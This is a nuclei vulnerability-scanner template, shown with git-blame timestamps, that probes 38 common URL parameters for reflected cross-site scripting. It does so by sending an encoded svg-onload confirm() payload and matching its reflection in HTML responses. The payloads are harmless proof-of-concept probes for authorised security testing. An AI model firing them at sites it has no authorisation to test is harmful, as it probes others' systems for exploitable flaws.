nuclei-templates/vulnerabilities/generic/top-xss-params.yaml

82 lines
5.1 KiB
YAML
Raw Normal View History

2021-01-09 13:02:04 +00:00
id: top-xss-params
2020-08-15 08:48:23 +00:00
info:
name: Top 38 XSS Parameter Check
2021-06-09 12:20:56 +00:00
author: foulenzer,geeknik
2020-08-15 08:48:23 +00:00
severity: medium
description: Searches for reflected XSS in the server response via GET-requests.
2021-08-11 07:38:49 +00:00
tags: xss,generic
2021-09-16 15:54:33 +00:00
metadata:
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year
2020-08-15 08:48:23 +00:00
requests:
- method: GET
path:
2021-05-07 09:51:59 +00:00
- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E"
- "{{BaseURL}}/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E"
- "{{BaseURL}}/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E"
2021-04-06 08:15:46 +00:00
redirects: true
max-redirects: 1
2020-09-04 07:49:39 +00:00
matchers-condition: and
2020-08-15 08:48:23 +00:00
matchers:
- type: word
2021-10-31 10:54:36 +00:00
part: body
condition: or
2020-08-15 08:48:23 +00:00
words:
- "'>\"<svg/onload=confirm('q')>"
- "'>\"<svg/onload=confirm('s')>"
- "'>\"<svg/onload=confirm('search')>"
- "'>\"<svg/onload=confirm('id')>"
- "'>\"<svg/onload=confirm('action')>"
- "'>\"<svg/onload=confirm('keyword')>"
- "'>\"<svg/onload=confirm('query')>"
- "'>\"<svg/onload=confirm('page')>"
- "'>\"<svg/onload=confirm('keywords')>"
- "'>\"<svg/onload=confirm('url')>"
- "'>\"<svg/onload=confirm('view')>"
- "'>\"<svg/onload=confirm('cat')>"
- "'>\"<svg/onload=confirm('name')>"
- "'>\"<svg/onload=confirm('key')>"
- "'>\"<svg/onload=confirm('p')>"
- "'>\"<svg/onload=confirm('month')>"
- "'>\"<svg/onload=confirm('page_id')>"
- "'>\"<svg/onload=confirm('password')>"
- "'>\"<svg/onload=confirm('terms')>"
- "'>\"<svg/onload=confirm('token')>"
- "'>\"<svg/onload=confirm('type')>"
- "'>\"<svg/onload=confirm('unsubscribe_token')>"
- "'>\"<svg/onload=confirm('api')>"
- "'>\"<svg/onload=confirm('api_key')>"
- "'>\"<svg/onload=confirm('begindate')>"
- "'>\"<svg/onload=confirm('callback')>"
- "'>\"<svg/onload=confirm('categoryid')>"
- "'>\"<svg/onload=confirm('csrf_token')>"
- "'>\"<svg/onload=confirm('email')>"
- "'>\"<svg/onload=confirm('emailto')>"
- "'>\"<svg/onload=confirm('enddate')>"
- "'>\"<svg/onload=confirm('immagine')>"
- "'>\"<svg/onload=confirm('item')>"
- "'>\"<svg/onload=confirm('jsonp')>"
- "'>\"<svg/onload=confirm('l')>"
- "'>\"<svg/onload=confirm('lang')>"
- "'>\"<svg/onload=confirm('list_type')>"
- "'>\"<svg/onload=confirm('year')>"
2020-11-26 17:59:40 +00:00
2020-09-04 07:46:30 +00:00
- type: word
2021-10-31 10:54:36 +00:00
part: header
2020-09-04 07:46:30 +00:00
words:
2020-12-02 04:31:03 +00:00
- "text/html"
2021-01-11 06:44:22 +00:00
- type: word
2021-10-31 10:54:36 +00:00
part: body
condition: or
negative: true
words:
- "<title>Access Denied</title>"
- "You don't have permission to access"
2021-01-11 06:44:22 +00:00
- type: status
status:
2021-05-06 12:55:40 +00:00
- 200